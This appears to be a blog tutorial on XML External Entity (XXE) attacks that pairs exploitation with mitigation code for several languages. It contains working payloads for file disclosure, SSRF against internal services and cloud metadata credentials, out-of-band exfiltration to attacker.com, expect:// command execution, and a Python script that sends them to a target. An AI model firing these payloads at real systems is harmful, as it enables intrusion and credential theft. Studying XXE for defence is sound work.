Menu

XXE Attacks: Understanding and Exploiting XML External Entity Vulnerabilities

January 15, 2025
by Kieran Jessup

What is XXE?

XML External Entity (XXE) attacks are a type of web security vulnerability that occurs when weakly configured XML parsers support XML features that allow external entity references. This vulnerability can lead to:

  • File Disclosure: Reading sensitive files from the server
  • Server-Side Request Forgery (SSRF): Making requests to internal services
  • Remote Code Execution (RCE): In some cases, executing arbitrary code
  • Denial of Service (DoS): Through entity expansion attacks

How XXE Works

XML External Entity Basics
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

Understanding XXE Vulnerabilities

HIGH SEVERITY
XML External Entity Structure:

XXE attacks leverage the XML DOCTYPE declaration to define external entities that reference external resources. When the XML parser processes these entities, it attempts to fetch the referenced content.

Key Components:
  • DOCTYPE Declaration: Defines the document type and entities
  • ENTITY Definition: Creates a reference to an external resource
  • SYSTEM Keyword: Indicates the entity references an external URI
  • Entity Reference: &xxe; tells the parser to fetch the external content
Attack Flow:
  1. Attacker sends malicious XML with external entity reference
  2. XML parser processes the DOCTYPE declaration
  3. Parser attempts to fetch the external resource
  4. Content is included in the XML document
  5. Response may contain sensitive data
MITRE ATT&CK: T1190 - Exploit Public-Facing Application
OWASP Top 10: A05:2021 - Security Misconfiguration
CWE: CWE-611 - Improper Restriction of XML External Entity Reference

Common XXE Attack Vectors

1. File Disclosure

The most common XXE attack involves reading sensitive files from the server:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

This payload attempts to read the /etc/passwd file, which contains user account information.

2. SSRF via XXE

XXE can be used to perform Server-Side Request Forgery attacks:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">]>
<foo>&xxe;</foo>

This can help attackers discover and access internal services that aren’t directly accessible from the internet.

3. Out-of-Band (OOB) XXE

When direct file reading isn’t possible, attackers can use OOB techniques:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;]>
<foo>&send;</foo>

With the external DTD file containing:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%send;

Real-World XXE Example

Let’s examine a practical XXE vulnerability in a web application:

XXE Payload Injection

Request
POST https://vulnerable-app.com/api/process
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: */*
Content-Length: 156
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>
Response
200 OK
HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx/1.18.0
{
"status": "success",
"user": {
  "name": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin",
  "email": "test@example.com"
}
}

Advanced XXE Techniques

1. Parameter Entity Expansion

For more complex attacks, parameter entities can be used:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
]>
<data>&exfil;</data>

2. XXE in Different Protocols

XXE can exploit various protocols beyond file://:

Protocol Exploitation
# File Protocol
<!ENTITY xxe SYSTEM "file:///etc/passwd">

# HTTP Protocol  
<!ENTITY xxe SYSTEM "http://internal-service/admin">

# FTP Protocol
<!ENTITY xxe SYSTEM "ftp://attacker.com/evil">

# PHP Wrapper
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">

# Data Protocol
<!ENTITY xxe SYSTEM "data://text/plain;base64,PD94bWw+">

XXE Protocol Support

HIGH SEVERITY
Protocol Support in XXE:

Different XML parsers support various protocols for external entity resolution. The supported protocols determine the attack vectors available to attackers.

Common Protocols:
  • file:// - Read local files (most common)
  • http:// - Make HTTP requests (SSRF)
  • ftp:// - FTP protocol support
  • php:// - PHP stream wrappers
  • data:// - Data URI scheme
  • gopher:// - Gopher protocol (rare)
PHP Wrapper Techniques:

PHP applications often support stream wrappers that can be exploited:

  • Base64 Encoding: php://filter/read=convert.base64-encode/resource=file
  • Zlib Compression: php://filter/read=zlib.deflate/resource=file
  • Input Filtering: php://input for POST data processing
Security Implications:
  • File disclosure across multiple protocols
  • Internal network reconnaissance
  • Bypass of access controls
  • Data exfiltration via multiple channels

3. XXE in Different File Formats

XXE isn’t limited to XML files. Many file formats support XML:

  • Office Documents: .docx, .xlsx, .pptx
  • PDF Files: Some PDF parsers support XML
  • SVG Images: Scalable Vector Graphics
  • SOAP APIs: Web services using XML
  • RSS Feeds: Really Simple Syndication

Detection and Exploitation

1. Identifying XXE Vulnerabilities

XXE Detection Methods
# 1. Look for XML Processing
- SOAP APIs
- REST APIs accepting XML
- File upload functionality
- Document processing

# 2. Test with Simple Payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<test>&xxe;</test>

# 3. Monitor for Outbound Requests
- Check server logs
- Monitor network traffic
- Use Burp Collaborator

# 4. Error-Based Detection
- Look for XML parsing errors
- Check for file path disclosures
- Monitor for timeout responses

Finding XXE Vulnerabilities

MEDIUM SEVERITY
XXE Detection Strategy:

Identifying XXE vulnerabilities requires a systematic approach to find XML processing endpoints and test their security.

Common Entry Points:
  • API Endpoints: REST/SOAP services accepting XML
  • File Uploads: Document processing applications
  • Form Submissions: Web forms that process XML data
  • Import Features: Data import functionality
  • Search Functions: Advanced search with XML queries
Testing Methodology:
  1. Reconnaissance: Identify XML processing endpoints
  2. Basic Testing: Send simple XXE payloads
  3. Error Analysis: Monitor for parsing errors
  4. Outbound Testing: Use OOB techniques
  5. Protocol Testing: Test different URI schemes
Indicators of Vulnerability:
  • XML parsing errors in responses
  • File content appearing in responses
  • Outbound HTTP requests to attacker servers
  • Timeout responses indicating processing delays
  • Error messages revealing file paths

2. Automated XXE Testing

Several tools can help automate XXE detection:

# OWASP ZAP
zap-cli quick-scan --self-contained --start-options "-config api.disablekey=true" https://target.com

# Burp Suite Professional
# Use the XXE Scanner extension

# Custom Python Script
import requests

xxe_payload = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>'''

response = requests.post('https://target.com/api/process', 
                        data=xxe_payload,
                        headers={'Content-Type': 'application/xml'})
print(response.text)

Mitigation Strategies

1. Disable External Entity Processing

The most effective mitigation is to disable external entity processing entirely:

Java (SAX Parser):

SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Python (lxml):

from lxml import etree
parser = etree.XMLParser(resolve_entities=False)
tree = etree.parse(xml_file, parser)

PHP:

libxml_disable_entity_loader(true);

2. Input Validation and Sanitization

XXE Mitigation Techniques
# 1. Disable DOCTYPE Processing
- Set disallow-doctype-decl feature
- Disable external entity resolution
- Use secure XML parsers

# 2. Input Validation
- Whitelist allowed XML elements
- Block DOCTYPE declarations
- Validate XML structure

# 3. Output Encoding
- Encode XML output
- Sanitize user input
- Use parameterized queries

# 4. Network Security
- Block outbound requests
- Use firewalls
- Monitor network traffic

# 5. Security Headers
- Content Security Policy
- X-Content-Type-Options
- X-Frame-Options

Preventing XXE Attacks

LOW SEVERITY
Comprehensive XXE Mitigation:

Preventing XXE attacks requires a multi-layered approach combining technical controls, input validation, and security monitoring.

Technical Controls:
  • Parser Configuration: Disable external entity processing
  • Feature Flags: Use secure XML parser features
  • Library Updates: Keep XML libraries updated
  • Alternative Parsers: Use XXE-resistant parsers
Input Validation:
  • Schema Validation: Use XML Schema (XSD) validation
  • Content Filtering: Block DOCTYPE declarations
  • Element Whitelisting: Only allow expected XML elements
  • Size Limits: Restrict XML document size
Network Security:
  • Outbound Filtering: Block external requests from servers
  • Firewall Rules: Restrict network access
  • Monitoring: Log and alert on suspicious requests
  • Segmentation: Isolate XML processing services
Security Best Practices:
  • Principle of Least Privilege: Minimize server permissions
  • Regular Audits: Test for XXE vulnerabilities
  • Security Training: Educate developers about XXE
  • Incident Response: Have a plan for XXE incidents

3. Secure XML Processing Libraries

Use XXE-resistant XML processing libraries:

Java:

// Use JAXB instead of SAX/DOM for simple cases
JAXBContext context = JAXBContext.newInstance(MyClass.class);
Unmarshaller unmarshaller = context.createUnmarshaller();

Python:

# Use defusedxml instead of standard library
from defusedxml import ElementTree
tree = ElementTree.parse(xml_file)

Node.js:

// Use xml2js with secure options
const xml2js = require('xml2js');
const parser = new xml2js.Parser({
  explicitArray: false,
  ignoreAttrs: true,
  explicitRoot: false
});

Real-World XXE Examples

1. Adobe Flash XXE (CVE-2015-3269)

Adobe Flash Player had an XXE vulnerability that allowed attackers to read local files:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
&xxe;
</cross-domain-policy>

2. WordPress XXE (CVE-2017-9062)

WordPress had an XXE vulnerability in the XML-RPC functionality that allowed file disclosure:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>&file;</value></param>
</params>
</methodCall>

XXE in Modern Applications

1. API Security

Modern REST APIs often process XML data and may be vulnerable to XXE:

API XXE Example

Request
POST https://api.example.com/v1/users
Content-Type: application/xml
Authorization: Bearer token123
Accept: application/json
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>&xxe;</name>
<email>test@example.com</email>
</user>
Response
200 OK
HTTP/1.1 200 OK
Content-Type: application/json
Server: nginx
{
"id": 123,
"name": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin",
"email": "test@example.com",
"created_at": "2025-01-15T10:30:00Z"
}

2. Cloud Services

Cloud services and serverless functions may also be vulnerable to XXE:

<!-- AWS Lambda XXE Example -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>
<data>&xxe;</data>

Advanced XXE Exploitation

1. Blind XXE

When direct file reading isn’t possible, blind XXE techniques can be used:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
]>
<data>&exfil;</data>

2. XXE for RCE

In some cases, XXE can lead to remote code execution:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "expect://id">]>
<data>&xxe;</data>

Tools and Resources

1. XXE Testing Tools

  • Burp Suite Professional: Built-in XXE scanner
  • OWASP ZAP: Free XXE detection
  • XXEinjector: Python-based XXE testing tool
  • XXE-Out-of-Band: OOB XXE exploitation tool

2. Payload Repositories

  • PayloadsAllTheThings: Comprehensive XXE payloads
  • OWASP XXE Cheat Sheet: Official OWASP guidance
  • HackTricks XXE: Practical exploitation techniques

3. Learning Resources

  • PortSwigger XXE Lab: Interactive XXE training
  • OWASP WebGoat: XXE vulnerability training
  • HackTheBox: XXE challenge machines

Conclusion

XXE attacks remain a significant threat to web applications that process XML data. Understanding the vulnerability, exploitation techniques, and mitigation strategies is crucial for security professionals and developers.

Key takeaways:

  1. XXE is still prevalent in modern applications despite being well-known
  2. Multiple attack vectors exist beyond simple file reading
  3. Comprehensive mitigation requires technical controls and security practices
  4. Regular testing is essential to detect XXE vulnerabilities
  5. Security awareness among developers is crucial for prevention

By implementing proper security controls, using secure XML parsers, and maintaining security awareness, organizations can effectively protect against XXE attacks and maintain the security of their applications.

References

📚 Official Documentation

🔬 Learning Resources

🛠️ Tools & Testing

📖 Additional Reading

If you found this XXE guide helpful, you might also be interested in these related posts from my blog:

Practical XXE Examples:

  • HTB - BountyHunter - Real-world XXE exploitation walkthrough with file disclosure and privilege escalation

Learning Path:

  1. Start with: PortSwigger XXE Lab - Interactive XXE training environment
  2. Practice on: HTB - BountyHunter - See XXE in action with a complete walkthrough
  3. Advanced: Apply these techniques to your own testing and bug bounty programs

External HTB Machines with XXE:

For additional practice, consider these HackTheBox machines that feature XXE vulnerabilities: